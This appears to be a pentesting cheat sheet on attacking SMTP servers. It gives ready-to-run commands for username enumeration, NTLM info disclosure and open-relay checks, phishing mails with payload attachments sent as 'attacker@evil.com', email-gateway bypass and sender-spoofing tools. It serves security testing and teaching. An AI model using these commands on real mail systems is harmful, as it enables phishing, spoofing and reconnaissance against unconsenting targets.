Documentation Index
Fetch the complete documentation index at: https://mintlify.com/HackTricks-wiki/hacktricks/llms.txt
Use this file to discover all available pages before exploring further.
The Simple Mail Transfer Protocol (SMTP) is used for sending and receiving email. It is commonly paired with POP3 or IMAP for message retrieval.
Default Ports: 25 (SMTP), 465 (SMTPS), 587 (SMTP with STARTTLS)
Basic Connections
# SMTP (plain)
nc -vn <IP> 25
# SMTPS (TLS)
openssl s_client -crlf -connect smtp.mailgun.org:465
# SMTP with STARTTLS
openssl s_client -starttls smtp -crlf -connect smtp.mailgun.org:587
Enumeration
# Nmap
nmap -p25 --script smtp-commands 10.10.10.10
nmap -p25 --script smtp-open-relay 10.10.10.10 -v
nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720 -p 25 <IP>
# Find MX servers
dig +short mx google.com
NTLM Info Disclosure
If the server supports NTLM auth (Windows), send a challenge to extract version info:
telnet example.com 587
>> HELO
>> AUTH NTLM 334
>> TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=
# Response contains: IIS version, Windows version
# Automate with nmap
nmap -p25 --script smtp-ntlm-info.nse <IP>
Username Enumeration
telnet 1.1.1.1 25
HELO x
VRFY root
# 250 Super-User root@myhost = exists
VRFY blah
# 550 blah... User unknown
telnet 1.1.1.1 25
HELO x
MAIL FROM:example@domain.com
RCPT TO:test
# 550 = unknown, 250 = exists
EXPN root
# 250 2.1.5 ed.williams@myhost
EXPN sshd
# 250 2.1.5 sshd privsep sshd@myhost
smtp-user-enum -M VRFY -U users.txt -t <IP>
smtp-user-enum -M EXPN -U users.txt -t <IP>
smtp-user-enum -M RCPT -U users.txt -t <IP>
msf> use auxiliary/scanner/smtp/smtp_enum
Sending Emails
# sendEmail
sendEmail -t to@domain.com -f from@attacker.com -s <smtp_ip> \
-u "Important subject" -a /tmp/payload.pdf
# swaks
swaks --to victim@target.com \
--from attacker@evil.com \
--header "Subject: Test" \
--body "Click http://attacker/" \
--server <SMTP_IP>
# With attachment (use @ prefix to embed file bytes)
swaks --to hr@example.local --from attacker@evil.com \
--header "Subject: Resume" \
--body "Please review" \
--attach @resume.doc \
--server 10.0.0.5
Email Security Mechanisms
SPF (Sender Policy Framework)
# Check SPF record
dig txt google.com | grep spf
# Online validator
# https://www.kitterman.com/spf/validate.html
+ = PASS (default)? = NEUTRAL~ = SOFTFAIL (accept but mark)- = FAIL (reject)
DKIM (DomainKeys Identified Mail)
# Get DKIM public key (need selector from email headers)
dig 20120113._domainkey.gmail.com TXT | grep p=
DMARC
# Get DMARC record
dig _dmarc.facebook.com txt | grep DMARC
# p=reject: strict rejection
# p=quarantine: mark as spam
# p=none: monitoring only
Avoiding Email Security Gateways (SEGs)
Organizations using Entra ID / Exchange Online often have multiple accepted domains. If any accepted domain has an MX record pointing directly to the mail server (bypassing the SEG), you can deliver mail avoiding the gateway.The default <tenant>.onmicrosoft.com domain always has MX pointing to Exchange Online.
# Enumerate accepted domains
dnsx -d target.com -mx
# Send to tenant.onmicrosoft.com to bypass SEG
# swaks --to user@tenant.onmicrosoft.com ...
SMTP Spoofing
# Check for spoofing vulnerabilities
python3 -m serain.mailspoof target.com
python3 checkdmarc.py target.com
# Automated spoofing
python3 magicspoofmail.py -d victim.com -t -e destination@gmail.com
python3 magicspoofmail.py -d victim.com -t -e destination@gmail.com \
--subject TEST --sender administrator@victim.com
Open Relay Testing
nmap -p25 --script smtp-open-relay 10.10.10.10 -v
mynetworks = 0.0.0.0/0 # Accepts connections from any IP
SMTP Smuggling
SMTP smuggling allows bypassing SPF, DKIM, and DMARC protections by exploiting line ending interpretation differences between SMTP servers. Some servers accept <LF>.<LF> while others only accept <CR><LF>.<CR><LF>, enabling message injection.
Config Files
/etc/postfix/master.cf
/etc/postfix/main.cf
sendmail.cf
submit.cf
- Internal server names and IP addresses
- Antivirus software info (
X-Virus-Scanned header)
- Internal relay hops
NDN (Non-Delivery Notification) Harvesting
Send emails to non-existent addresses. The bounce-back NDN often contains:
- Internal server names
- IP addresses of mail infrastructure
- AV software information
